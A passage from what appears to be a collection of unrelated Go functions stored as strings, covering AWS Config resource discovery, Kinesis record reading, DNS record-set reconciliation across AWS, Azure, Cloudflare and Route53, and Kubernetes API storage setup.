"AWS::SageMaker::NotebookInstanceLifecycleConfig\",\n\t\t\"AWS::SageMaker::EndpointConfig\",\n\t\t\"AWS::SageMaker::Workteam\",\n\t\t\"AWS::SES::ConfigurationSet\",\n\t\t\"AWS::SES::ContactList\",\n\t\t\"AWS::SES::Template\",\n\t\t\"AWS::SES::ReceiptFilter\",\n\t\t\"AWS::SES::ReceiptRuleSet\",\n\t\t\"AWS::SNS::Topic\",\n\t\t\"AWS::SQS::Queue\",\n\t\t\"AWS::S3::Bucket\",\n\t\t\"AWS::S3::AccountPublicAccessBlock\",\n\t\t\"AWS::S3::MultiRegionAccessPoint\",\n\t\t\"AWS::S3::StorageLens\",\n\t\t\"AWS::EC2::CustomerGateway\",\n\t\t\"AWS::EC2::InternetGateway\",\n\t\t\"AWS::EC2::NetworkAcl\",\n\t\t\"AWS::EC2::RouteTable\",\n\t\t\"AWS::EC2::Subnet\",\n\t\t\"AWS::EC2::VPC\",\n\t\t\"AWS::EC2::VPNConnection\",\n\t\t\"AWS::EC2::VPNGateway\",\n\t\t\"AWS::NetworkManager::TransitGatewayRegistration\",\n\t\t\"AWS::NetworkManager::Site\",\n\t\t\"AWS::NetworkManager::Device\",\n\t\t\"AWS::NetworkManager::Link\",\n\t\t\"AWS::NetworkManager::GlobalNetwork\",\n\t\t\"AWS::WorkSpaces::ConnectionAlias\",\n\t\t\"AWS::WorkSpaces::Workspace\",\n\t\t\"AWS::Amplify::App\",\n\t\t\"AWS::AppConfig::Application\",\n\t\t\"AWS::AppConfig::Environment\",\n\t\t\"AWS::AppConfig::ConfigurationProfile\",\n\t\t\"AWS::AppConfig::DeploymentStrategy\",\n\t\t\"AWS::AppRunner::VpcConnector\",\n\t\t\"AWS::AppMesh::VirtualNode\",\n\t\t\"AWS::AppMesh::VirtualService\",\n\t\t\"AWS::AppSync::GraphQLApi\",\n\t\t\"AWS::AuditManager::Assessment\",\n\t\t\"AWS::AutoScaling::AutoScalingGroup\",\n\t\t\"AWS::AutoScaling::LaunchConfiguration\",\n\t\t\"AWS::AutoScaling::ScalingPolicy\",\n\t\t\"AWS::AutoScaling::ScheduledAction\",\n\t\t\"AWS::AutoScaling::WarmPool\",\n\t\t\"AWS::Backup::BackupPlan\",\n\t\t\"AWS::Backup::BackupSelection\",\n\t\t\"AWS::Backup::BackupVault\",\n\t\t\"AWS::Backup::RecoveryPoint\",\n\t\t\"AWS::Backup::ReportPlan\",\n\t\t\"AWS::Backup::BackupPlan\",\n\t\t\"AWS::Backup::BackupSelection\",\n\t\t\"AWS::Backup::BackupVault\",\n\t\t\"AWS::Backup::RecoveryPoint\",\n\t\t\"AWS::Batch::JobQueue\",\n\t\t\"AWS::Batch::ComputeEnvironment\",\n\t\t\"AWS::Budgets::BudgetsAction\",\n\t\t\"AWS::ACM::Certificate\",\n\t\t\"AWS::CloudFormation::Stack\",\n\t\t\"AWS::CloudTrail::Trail\",\n\t\t\"AWS::Cloud9::EnvironmentEC2\",\n\t\t\"AWS::ServiceDiscovery::Service\",\n\t\t\"AWS::ServiceDiscovery::PublicDnsNamespace\",\n\t\t\"AWS::ServiceDiscovery::HttpNamespace\",\n\t\t\"AWS::CodeArtifact::Repository\",\n\t\t\"AWS::CodeBuild::Project\",\n\t\t\"AWS::CodeDeploy::Application\",\n\t\t\"AWS::CodeDeploy::DeploymentConfig\",\n\t\t\"AWS::CodeDeploy::DeploymentGroup\",\n\t\t\"AWS::CodePipeline::Pipeline\",\n\t\t\"AWS::Config::ResourceCompliance\",\n\t\t\"AWS::Config::ConformancePackCompliance\",\n\t\t\"AWS::Config::ConfigurationRecorder\",\n\t\t\"AWS::Config::ResourceCompliance\",\n\t\t\"AWS::Config::ConfigurationRecorder\",\n\t\t\"AWS::Config::ConformancePackCompliance\",\n\t\t\"AWS::Config::ConfigurationRecorder\",\n\t\t\"AWS::DMS::EventSubscription\",\n\t\t\"AWS::DMS::ReplicationSubnetGroup\",\n\t\t\"AWS::DMS::ReplicationInstance\",\n\t\t\"AWS::DMS::ReplicationTask\",\n\t\t\"AWS::DMS::Certificate\",\n\t\t\"AWS::DataSync::LocationSMB\",\n\t\t\"AWS::DataSync::LocationFSxLustre\",\n\t\t\"AWS::DataSync::LocationFSxWindows\",\n\t\t\"AWS::DataSync::LocationS3\",\n\t\t\"AWS::DataSync::LocationEFS\",\n\t\t\"AWS::DataSync::LocationNFS\",\n\t\t\"AWS::DataSync::LocationHDFS\",\n\t\t\"AWS::DataSync::LocationObjectStorage\",\n\t\t\"AWS::DataSync::Task\",\n\t\t\"AWS::DeviceFarm::TestGridProject\",\n\t\t\"AWS::DeviceFarm::InstanceProfile\",\n\t\t\"AWS::DeviceFarm::Project\",\n\t\t\"AWS::ElasticBeanstalk::Application\",\n\t\t\"AWS::ElasticBeanstalk::ApplicationVersion\",\n\t\t\"AWS::ElasticBeanstalk::Environment\",\n\t\t\"AWS::FIS::ExperimentTemplate\",\n\t\t\"AWS::GlobalAccelerator::Listener\",\n\t\t\"AWS::GlobalAccelerator::EndpointGroup\",\n\t\t\"AWS::GlobalAccelerator::Accelerator\",\n\t\t\"AWS::Glue::Job\",\n\t\t\"AWS::Glue::Classifier\",\n\t\t\"AWS::Glue::MLTransform\",\n\t\t\"AWS::GroundStation::Config\",\n\t\t\"AWS::IAM::User\",\n\t\t\"AWS::IAM::SAMLProvider\",\n\t\t\"AWS::IAM::ServerCertificate\",\n\t\t\"AWS::IAM::Group\",\n\t\t\"AWS::IAM::Role\",\n\t\t\"AWS::IAM::Policy\",\n\t\t\"AWS::AccessAnalyzer::Analyzer\",\n\t\t\"AWS::IoT::Authorizer\",\n\t\t\"AWS::IoT::SecurityProfile\",\n\t\t\"AWS::IoT::RoleAlias\",\n\t\t\"AWS::IoT::Dimension\",\n\t\t\"AWS::IoT::Policy\",\n\t\t\"AWS::IoT::MitigationAction\",\n\t\t\"AWS::IoT::ScheduledAudit\",\n\t\t\"AWS::IoT::AccountAuditConfiguration\",\n\t\t\"AWS::IoTSiteWise::Gateway\",\n\t\t\"AWS::IoT::CustomMetric\",\n\t\t\"AWS::IoTWireless::ServiceProfile\",\n\t\t\"AWS::IoT::FleetMetric\",\n\t\t\"AWS::IoTAnalytics::Datastore\",\n\t\t\"AWS::IoTAnalytics::Dataset\",\n\t\t\"AWS::IoTAnalytics::Pipeline\",\n\t\t\"AWS::IoTAnalytics::Channel\",\n\t\t\"AWS::IoTEvents::Input\",\n\t\t\"AWS::IoTEvents::DetectorModel\",\n\t\t\"AWS::IoTEvents::AlarmModel\",\n\t\t\"AWS::IoTTwinMaker::Workspace\",\n\t\t\"AWS::IoTTwinMaker::Entity\",\n\t\t\"AWS::IoTTwinMaker::Scene\",\n\t\t\"AWS::IoTSiteWise::Dashboard\",\n\t\t\"AWS::IoTSiteWise::Project\",\n\t\t\"AWS::IoTSiteWise::Portal\",\n\t\t\"AWS::IoTSiteWise::AssetModel\",\n\t\t\"AWS::KMS::Key\",\n\t\t\"AWS::KMS::Alias\",\n\t\t\"AWS::Lambda::Function\",\n\t\t\"AWS::Lambda::Alias\",\n\t\t\"AWS::NetworkFirewall::Firewall\",\n\t\t\"AWS::NetworkFirewall::FirewallPolicy\",\n\t\t\"AWS::NetworkFirewall::RuleGroup\",\n\t\t\"AWS::NetworkFirewall::TLSInspectionConfiguration\",\n\t\t\"AWS:Panorama::Package\",\n\t\t\"AWS::ResilienceHub::ResiliencyPolicy\",\n\t\t\"AWS::RoboMaker::RobotApplicationVersion\",\n\t\t\"AWS::RoboMaker::RobotApplication\",\n\t\t\"AWS::RoboMaker::SimulationApplication\",\n\t\t\"AWS::Signer::SigningProfile\",\n\t\t\"AWS::SecretsManager::Secret\",\n\t\t\"AWS::ServiceCatalog::CloudFormationProduct\",\n\t\t\"AWS::ServiceCatalog::CloudFormationProvisionedProduct\",\n\t\t\"AWS::ServiceCatalog::Portfolio\",\n\t\t\"AWS::Shield::Protection\",\n\t\t\"AWS::ShieldRegional::Protection\",\n\t\t\"AWS::StepFunctions::Activity\",\n\t\t\"AWS::StepFunctions::StateMachine\",\n\t\t\"AWS::SSM::ManagedInstanceInventory\",\n\t\t\"AWS::SSM::PatchCompliance\",\n\t\t\"AWS::SSM::AssociationCompliance\",\n\t\t\"AWS::SSM::FileData\",\n\t\t\"AWS::Transfer::Agreement\",\n\t\t\"AWS::Transfer::Connector\",\n\t\t\"AWS::Transfer::Workflow\",\n\t\t\"AWS::WAF::RateBasedRule\",\n\t\t\"AWS::WAF::Rule\",\n\t\t\"AWS::WAF::WebACL\",\n\t\t\"AWS::WAF::RuleGroup\",\n\t\t\"AWS::WAFRegional::RateBasedRule\",\n\t\t\"AWS::WAFRegional::Rule\",\n\t\t\"AWS::WAFRegional::WebACL\",\n\t\t\"AWS::WAFRegional::RuleGroup\",\n\t\t\"AWS::WAFv2::WebACL\",\n\t\t\"AWS::WAFv2::RuleGroup\",\n\t\t\"AWS::WAFv2::ManagedRuleSet\",\n\t\t\"AWS::WAFv2::IPSet\",\n\t\t\"AWS::WAFv2::RegexPatternSet\",\n\t\t\"AWS::XRay::EncryptionConfig\",\n\t\t\"AWS::ElasticLoadBalancingV2::LoadBalancer\",\n\t\t\"AWS::ElasticLoadBalancingV2::Listener\",\n\t\t\"AWS::ElasticLoadBalancing::LoadBalancer\",\n\t\t\"AWS::ElasticLoadBalancingV2::LoadBalancer\",\n\t\t\"AWS::MediaPackage::PackagingGroup\",\n\t\t\"AWS::MediaPackage::PackagingConfiguration\",\n\t}\n\t// nolint: prealloc\n\tvar res []*configservice.ResourceIdentifier\n\n\tfor _, t := range &resourceTypes {\n\t\tt := t\n\t\tinput := &configservice.ListDiscoveredResourcesInput{\n\t\t\tResourceType: aws.String(t),\n\t\t}\n\n\t\tresult, err := c.Client.ListDiscoveredResources(input)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error ListDiscoveredResources (ResourceType: %s): %v\\n\", t, err)\n\t\t\treturn nil, err\n\t\t}\n\n\t\tres = append(res, result.ResourceIdentifiers...)\n\n\t\tfor aws.StringValue(result.NextToken) != \"\" {\n\t\t\tinput.NextToken = result.NextToken\n\n\t\t\tresult, err = c.Client.ListDiscoveredResources(input)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Error ListDiscoveredResources (Input: %v): %v\\n\", input, err)\n\t\t\t\treturn nil, err\n\t\t\t}\n\n\t\t\tres = append(res, result.ResourceIdentifiers...)\n\t\t}\n\t}\n\n\treturn res, nil\n}", "func (m *Store) GetSets()([]Setable) {\n return m.sets\n}", "func GetRecords(kc kinesisiface.KinesisAPI, name string) []*kinesis.Record {\n\tvar recordList []*kinesis.Record\n\n\tshards, err := kc.ListShards(&kinesis.ListShardsInput{\n\t\tStreamName: &name,\n\t})\n\tif err != nil {\n\t\tframework.FailfWithOffset(2, \"Failed to get shards from stream: %s\", err)\n\t}\n\n\tfor _, s := range shards.Shards {\n\t\tshardIterator, err := kc.GetShardIterator(&kinesis.GetShardIteratorInput{\n\t\t\tShardId: s.ShardId,\n\t\t\tShardIteratorType: aws.String(\"TRIM_HORIZON\"),\n\t\t\tStreamName: &name,\n\t\t})\n\t\tif err != nil {\n\t\t\tframework.FailfWithOffset(2, \"Failed to get shard iterator from stream: %s\", err)\n\t\t}\n\n\t\trecords, err := kc.GetRecords(&kinesis.GetRecordsInput{\n\t\t\tShardIterator: shardIterator.ShardIterator,\n\t\t})\n\t\tif err != nil {\n\t\t\tframework.FailfWithOffset(2, \"Failed to get records from stream: %s\", err)\n\t\t}\n\t\trecordList = append(recordList, records.Records...)\n\t}\n\n\treturn recordList\n}", "func (d *DNSController) ensureDNSRrsets(dnsZone dnsprovider.Zone, dnsName string, endpoints []string, uplevelCname string) error {\n\trrsets, supported := dnsZone.ResourceRecordSets()\n\tif !supported {\n\t\treturn fmt.Errorf(\"Failed to ensure DNS records for %s. DNS provider does not support the ResourceRecordSets interface\", dnsName)\n\t}\n\trrsetList, err := rrsets.Get(dnsName)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif len(rrsetList) == 0 {\n\t\tglog.V(4).Infof(\"No recordsets found for DNS name %q. Need to add either A records (if we have healthy endpoints), or a CNAME record to %q\", dnsName, uplevelCname)\n\t\tif len(endpoints) < 1 {\n\t\t\tglog.V(4).Infof(\"There are no healthy endpoint addresses at level %q, so CNAME to %q, if provided\", dnsName, uplevelCname)\n\t\t\tif uplevelCname != \"\" {\n\t\t\t\tglog.V(4).Infof(\"Creating CNAME to %q for %q\", uplevelCname, dnsName)\n\t\t\t\tnewRrset := rrsets.New(dnsName, []string{uplevelCname}, minDNSTTL, rrstype.CNAME)\n\t\t\t\tglog.V(4).Infof(\"Adding recordset %v\", newRrset)\n\t\t\t\terr = rrsets.StartChangeset().Add(newRrset).Apply()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tglog.V(4).Infof(\"Successfully created CNAME to %q for %q\", uplevelCname, dnsName)\n\t\t\t} else {\n\t\t\t\tglog.V(4).Infof(\"We want no record for %q, and we have no record, so we're all good.\", dnsName)\n\t\t\t}\n\t\t} else {\n\t\t\t// We have valid endpoint addresses, so just add them as A records.\n\t\t\t// But first resolve DNS names, as some cloud providers (like AWS) expose\n\t\t\t// load balancers behind DNS names, not IP addresses.\n\t\t\tglog.V(4).Infof(\"We have valid endpoint addresses %v at level %q, so add them as A records, after resolving DNS names\", endpoints, dnsName)\n\t\t\t// Resolve DNS through network\n\t\t\tresolvedEndpoints, err := getResolvedEndpoints(endpoints, d.netWrapper)\n\t\t\tif err != nil {\n\t\t\t\treturn err // TODO: We could potentially add the ones we did get back, even if some of them failed to resolve.\n\t\t\t}\n\n\t\t\tnewRrset := rrsets.New(dnsName, resolvedEndpoints, minDNSTTL, rrstype.A)\n\t\t\tglog.V(4).Infof(\"Adding recordset %v\", newRrset)\n\t\t\terr = rrsets.StartChangeset().Add(newRrset).Apply()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tglog.V(4).Infof(\"Successfully added recordset %v\", newRrset)\n\t\t}\n\t} else {\n\t\t// the rrsets already exists, so make it right.\n\t\tglog.V(4).Infof(\"Recordset %v already exists. Ensuring that it is correct.\", rrsetList)\n\t\tif len(endpoints) < 1 {\n\t\t\t// Need an appropriate CNAME record. Check that we have it.\n\t\t\tnewRrset := rrsets.New(dnsName, []string{uplevelCname}, minDNSTTL, rrstype.CNAME)\n\t\t\tglog.V(4).Infof(\"No healthy endpoints for %d. Have recordsets %v. Need recordset %v\", dnsName, rrsetList, newRrset)\n\t\t\tfound := findRrset(rrsetList, newRrset)\n\t\t\tif found != nil {\n\t\t\t\t// The existing rrset is equivalent to the required one - our work is done here\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is equivalent to needed recordset %v, our work is done here.\", rrsetList, newRrset)\n\t\t\t\treturn nil\n\t\t\t} else {\n\t\t\t\t// Need to replace the existing one with a better one (or just remove it if we have no healthy endpoints).\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v not equivalent to needed recordset %v removing existing and adding needed.\", rrsetList, newRrset)\n\t\t\t\tchangeSet := rrsets.StartChangeset()\n\t\t\t\tfor i := range rrsetList {\n\t\t\t\t\tchangeSet = changeSet.Remove(rrsetList[i])\n\t\t\t\t}\n\t\t\t\tif uplevelCname != \"\" {\n\t\t\t\t\tchangeSet = changeSet.Add(newRrset)\n\t\t\t\t\tif err := changeSet.Apply(); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tglog.V(4).Infof(\"Successfully replaced needed recordset %v -> %v\", found, newRrset)\n\t\t\t\t} else {\n\t\t\t\t\tif err := changeSet.Apply(); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tglog.V(4).Infof(\"Successfully removed existing recordset %v\", found)\n\t\t\t\t\tglog.V(4).Infof(\"Uplevel CNAME is empty string. Not adding recordset %v\", newRrset)\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\t// We have an rrset in DNS, possibly with some missing addresses and some unwanted addresses.\n\t\t\t// And we have healthy endpoints. Just replace what'd there with the healthy endpoints, if it'd not already correct.\n\t\t\tglog.V(4).Infof(\"%d: Healthy endpoints %v exist. Recordset %v exists. Reconciling.\", dnsName, endpoints, rrsetList)\n\t\t\tresolvedEndpoints, err := getResolvedEndpoints(endpoints, d.netWrapper)\n\t\t\tif err != nil { // Some invalid addresses or otherwise unresolvable DNS names.\n\t\t\t\treturn err // TODO: We could potentially add the ones we did get back, even if some of them failed to resolve.\n\t\t\t}\n\t\t\tnewRrset := rrsets.New(dnsName, resolvedEndpoints, minDNSTTL, rrstype.A)\n\t\t\tglog.V(4).Infof(\"Have recordset %v. Need recordset %v\", rrsetList, newRrset)\n\t\t\tfound := findRrset(rrsetList, newRrset)\n\t\t\tif found != nil {\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is equivalent to needed recordset %v, our work is done here.\", found, newRrset)\n\t\t\t\t// TODO: We could be more thorough about checking for equivalence to avoid unnecessary updates, but in the\n\t\t\t\t// worst case we'll just replace what'd there with an equivalent, if not exactly identical record set.\n\t\t\t\treturn nil\n\t\t\t} else {\n\t\t\t\t// Need to replace the existing one with a better one\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is not equivalent to needed recordset %v, removing existing and adding needed.\", found, newRrset)\n\t\t\t\tchangeSet := rrsets.StartChangeset()\n\t\t\t\tfor i := range rrsetList {\n\t\t\t\t\tchangeSet = changeSet.Remove(rrsetList[i])\n\t\t\t\t}\n\t\t\t\tchangeSet = changeSet.Add(newRrset)\n\t\t\t\tif err = changeSet.Apply(); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tglog.V(4).Infof(\"Successfully replaced recordset %v -> %v\", found, newRrset)\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func getResources() []EmbeddedResource {\n\ti := 0\n\tret := make([]EmbeddedResource, len(RESOURCES))\n\tfor _, v := range RESOURCES {\n\t\tret[i] = v\n\t\ti++\n\t}\n\treturn ret\n}", "func (client *RecordSetsClient) getCreateRequest(ctx context.Context, resourceGroupName string, privateZoneName string, recordType RecordType, relativeRecordSetName string, options *RecordSetsGetOptions) (*azcore.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/privateDnsZones/{privateZoneName}/{recordType}/{relativeRecordSetName}\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif privateZoneName == \"\" {\n\t\treturn nil, errors.New(\"parameter privateZoneName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{privateZoneName}\", url.PathEscape(privateZoneName))\n\tif recordType == \"\" {\n\t\treturn nil, errors.New(\"parameter recordType cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{recordType}\", url.PathEscape(string(recordType)))\n\tif relativeRecordSetName == \"\" {\n\t\treturn nil, errors.New(\"parameter relativeRecordSetName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{relativeRecordSetName}\", relativeRecordSetName)\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := azcore.NewRequest(ctx, http.MethodGet, azcore.JoinPaths(client.con.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Telemetry(telemetryInfo)\n\treqQP := req.URL.Query()\n\treqQP.Set(\"api-version\", \"2020-06-01\")\n\treq.URL.RawQuery = reqQP.Encode()\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func (m *EducationAssignment) GetResources()([]EducationAssignmentResourceable) {\n return m.resources\n}", "func (client GroupClient) ListDatabasesPreparer(accountName string, filter string, top *int32, skip *int32, expand string, selectParameter string, orderby string, count *bool) (*http.Request, error) {\n\turlParameters := map[string]interface{}{\n\t\t\"accountName\": accountName,\n\t\t\"adlaCatalogDnsSuffix\": client.AdlaCatalogDNSSuffix,\n\t}\n\n\tconst APIVersion = \"2015-10-01-preview\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\tif len(filter) > 0 {\n\t\tqueryParameters[\"$filter\"] = autorest.Encode(\"query\", filter)\n\t}\n\tif top != nil {\n\t\tqueryParameters[\"$top\"] = autorest.Encode(\"query\", *top)\n\t}\n\tif skip != nil {\n\t\tqueryParameters[\"$skip\"] = autorest.Encode(\"query\", *skip)\n\t}\n\tif len(expand) > 0 {\n\t\tqueryParameters[\"$expand\"] = autorest.Encode(\"query\", expand)\n\t}\n\tif len(selectParameter) > 0 {\n\t\tqueryParameters[\"$select\"] = autorest.Encode(\"query\", selectParameter)\n\t}\n\tif len(orderby) > 0 {\n\t\tqueryParameters[\"$orderby\"] = autorest.Encode(\"query\", orderby)\n\t}\n\tif count != nil {\n\t\tqueryParameters[\"$count\"] = autorest.Encode(\"query\", *count)\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithCustomBaseURL(\"https://{accountName}.{adlaCatalogDnsSuffix}\", urlParameters),\n\t\tautorest.WithPath(\"/catalog/usql/databases\"),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare(&http.Request{})\n}", "func (m *Master) getExtensionResources(c *Config) map[string]rest.Storage {\n\t// All resources except these are disabled by default.\n\tenabledResources := sets.NewString(\"daemonsets\", \"deployments\", \"horizontalpodautoscalers\", \"ingresses\", \"jobs\", \"replicasets\")\n\tresourceOverrides := m.ApiGroupVersionOverrides[\"extensions/v1beta1\"].ResourceOverrides\n\tisEnabled := func(resource string) bool {\n\t\t// Check if the resource has been overriden.\n\t\tenabled, ok := resourceOverrides[resource]\n\t\tif !ok {\n\t\t\treturn enabledResources.Has(resource)\n\t\t}\n\t\treturn enabled\n\t}\n\trestOptions := func(resource string) generic.RESTOptions {\n\t\treturn generic.RESTOptions{\n\t\t\tStorage: c.StorageDestinations.Get(extensions.GroupName, resource),\n\t\t\tDecorator: m.StorageDecorator(),\n\t\t\tDeleteCollectionWorkers: m.deleteCollectionWorkers,\n\t\t}\n\t}\n\n\tstorage := map[string]rest.Storage{}\n\n\tif isEnabled(\"horizontalpodautoscalers\") {\n\t\tm.constructHPAResources(c, storage)\n\t\tcontrollerStorage := expcontrolleretcd.NewStorage(\n\t\t\tgeneric.RESTOptions{c.StorageDestinations.Get(\"\", \"replicationControllers\"), m.StorageDecorator(), m.deleteCollectionWorkers})\n\t\tstorage[\"replicationcontrollers\"] = controllerStorage.ReplicationController\n\t\tstorage[\"replicationcontrollers/scale\"] = controllerStorage.Scale\n\t}\n\tif isEnabled(\"thirdpartyresources\") {\n\t\tthirdPartyResourceStorage := thirdpartyresourceetcd.NewREST(restOptions(\"thirdpartyresources\"))\n\t\tthirdPartyControl := ThirdPartyController{\n\t\t\tmaster: m,\n\t\t\tthirdPartyResourceRegistry: thirdPartyResourceStorage,\n\t\t}\n\t\tgo func() {\n\t\t\twait.Forever(func() {\n\t\t\t\tif err := thirdPartyControl.SyncResources(); err != nil {\n\t\t\t\t\tglog.Warningf(\"third party resource sync failed: %v\", err)\n\t\t\t\t}\n\t\t\t}, 10*time.Second)\n\t\t}()\n\n\t\tstorage[\"thirdpartyresources\"] = thirdPartyResourceStorage\n\t}\n\n\tif isEnabled(\"daemonsets\") {\n\t\tdaemonSetStorage, daemonSetStatusStorage := daemonetcd.NewREST(restOptions(\"daemonsets\"))\n\t\tstorage[\"daemonsets\"] = daemonSetStorage\n\t\tstorage[\"daemonsets/status\"] = daemonSetStatusStorage\n\t}\n\tif isEnabled(\"deployments\") {\n\t\tdeploymentStorage := deploymentetcd.NewStorage(restOptions(\"deployments\"))\n\t\tstorage[\"deployments\"] = deploymentStorage.Deployment\n\t\tstorage[\"deployments/status\"] = deploymentStorage.Status\n\t\tstorage[\"deployments/rollback\"] = deploymentStorage.Rollback\n\t\tstorage[\"deployments/scale\"] = deploymentStorage.Scale\n\t}\n\tif isEnabled(\"jobs\") {\n\t\tm.constructJobResources(c, storage)\n\t}\n\tif isEnabled(\"ingresses\") {\n\t\tingressStorage, ingressStatusStorage := ingressetcd.NewREST(restOptions(\"ingresses\"))\n\t\tstorage[\"ingresses\"] = ingressStorage\n\t\tstorage[\"ingresses/status\"] = ingressStatusStorage\n\t}\n\tif isEnabled(\"podsecuritypolicy\") {\n\t\tpodSecurityPolicyStorage := pspetcd.NewREST(restOptions(\"podsecuritypolicy\"))\n\t\tstorage[\"podSecurityPolicies\"] = podSecurityPolicyStorage\n\t}\n\tif isEnabled(\"replicasets\") {\n\t\treplicaSetStorage := replicasetetcd.NewStorage(restOptions(\"replicasets\"))\n\t\tstorage[\"replicasets\"] = replicaSetStorage.ReplicaSet\n\t\tstorage[\"replicasets/status\"] = replicaSetStorage.Status\n\t\tstorage[\"replicasets/scale\"] = replicaSetStorage.Scale\n\t}\n\n\treturn storage\n}", "func (extension *ServerFarmExtension) GetExtendedResources() []genruntime.KubernetesResource {\n\treturn []genruntime.KubernetesResource{\n\t\t&v20220301.ServerFarm{},\n\t\t&v20220301s.ServerFarm{},\n\t\t&v1beta20220301.ServerFarm{},\n\t\t&v1beta20220301s.ServerFarm{}}\n}", "func (s *ResourceRecordSetServer) applyResourceRecordSet(ctx context.Context, c *dns.Client, request *dnspb.ApplyDnsResourceRecordSetRequest) (*dnspb.DnsResourceRecordSet, error) {\n\tp := ProtoToResourceRecordSet(request.GetResource())\n\tres, err := c.ApplyResourceRecordSet(ctx, p)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tr := ResourceRecordSetToProto(res)\n\treturn r, nil\n}", "func (s UserSet) Records() []m.UserSet {\n\trecs := s.RecordCollection.Records()\n\tres := make([]m.UserSet, len(recs))\n\tfor i, rec := range recs {\n\t\tres[i] = rec.Wrap(\"User\").(m.UserSet)\n\t}\n\treturn res\n}", "func (az *Cloud) GetResourceGroups() (sets.String, error) {\n\t// Kubelet won't set az.nodeInformerSynced, always return configured resourceGroup.\n\tif az.nodeInformerSynced == nil {\n\t\treturn sets.NewString(az.ResourceGroup), nil\n\t}\n\n\taz.nodeCachesLock.RLock()\n\tdefer az.nodeCachesLock.RUnlock()\n\tif !az.nodeInformerSynced() {\n\t\treturn nil, fmt.Errorf(\"node informer is not synced when trying to GetResourceGroups\")\n\t}\n\n\tresourceGroups := sets.NewString(az.ResourceGroup)\n\tfor _, rg := range az.nodeResourceGroups {\n\t\tresourceGroups.Insert(rg)\n\t}\n\n\treturn resourceGroups, nil\n}", "func findRecordsToAdd(configrr *route53Zone, awsrr []*route53.ResourceRecordSet) []*route53.Change {\n\n\tvar diff []*route53.Change\n\tlen1 := len(configrr.ResourceRecordSets)\n\tlen2 := len(awsrr)\n\n\tfor i := 1; i < len1; i++ {\n\t\tvar j int\n\t\tfor j = 0; j < len2; j++ {\n\t\t\t// Find a match, short circuit and go to the next iteration\n\t\t\tif configrr.ResourceRecordSets[i].Name == aws.StringValue(awsrr[j].Name) &&\n\t\t\t\tconfigrr.ResourceRecordSets[i].Type == aws.StringValue(awsrr[j].Type) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif j == len2 {\n\t\t\tchange, err := getChange(\"CREATE\", &configrr.ResourceRecordSets[i])\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Error getting change will adding recordset %s with error: %s \",\n\t\t\t\t\tconfigrr.ResourceRecordSets[i].Name, err)\n\t\t\t}\n\t\t\tdiff = append(diff, change)\n\t\t}\n\t}\n\n\treturn diff\n}", "func listStatefulSets(ctx context.Context, client crc.Client, exStatefulSet *estsv1.ExtendedStatefulSet) ([]v1beta2.StatefulSet, error) {\n\tctxlog.Debug(ctx, \"Listing StatefulSets owned by ExtendedStatefulSet '\", exStatefulSet.Name, \"'.\")\n\n\t// Get owned resources\n\t// Go through each StatefulSet\n\tresult := []v1beta2.StatefulSet{}\n\tallStatefulSets := &v1beta2.StatefulSetList{}\n\terr := client.List(\n\t\tctx,\n\t\t&crc.ListOptions{\n\t\t\tNamespace: exStatefulSet.Namespace,\n\t\t\tLabelSelector: labels.Everything(),\n\t\t},\n\t\tallStatefulSets)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfor _, statefulSet := range allStatefulSets.Items {\n\t\tif metav1.IsControlledBy(&statefulSet, exStatefulSet) {\n\t\t\tresult = append(result, statefulSet)\n\t\t\tctxlog.Debug(ctx, \"StatefulSet '\", statefulSet.Name, \"' owned by ExtendedStatefulSet '\", exStatefulSet.Name, \"'.\")\n\t\t} else {\n\t\t\tctxlog.Debug(ctx, \"StatefulSet '\", statefulSet.Name, \"' is not owned by ExtendedStatefulSet '\", exStatefulSet.Name, \"', ignoring.\")\n\t\t}\n\t}\n\n\treturn result, nil\n}", "func listDNSRecords(cfg *Config, c *CfVars, zoneID string, recordName string) ([]cloudflare.DNSRecord, error) {\n\tsubDomainRecord := cloudflare.DNSRecord{Name: recordName}\n\trec, err := c.API.DNSRecords(c.context, zoneID, subDomainRecord)\n\tif err != nil {\n\t\treturn nil, err\n\n\t}\n\n\treturn rec, nil\n}", "func testAccCheckDnsRecordSetDestroyProducerFramework(t *testing.T) func(s *terraform.State) error {\n\n\treturn func(s *terraform.State) error {\n\t\tfor name, rs := range s.RootModule().Resources 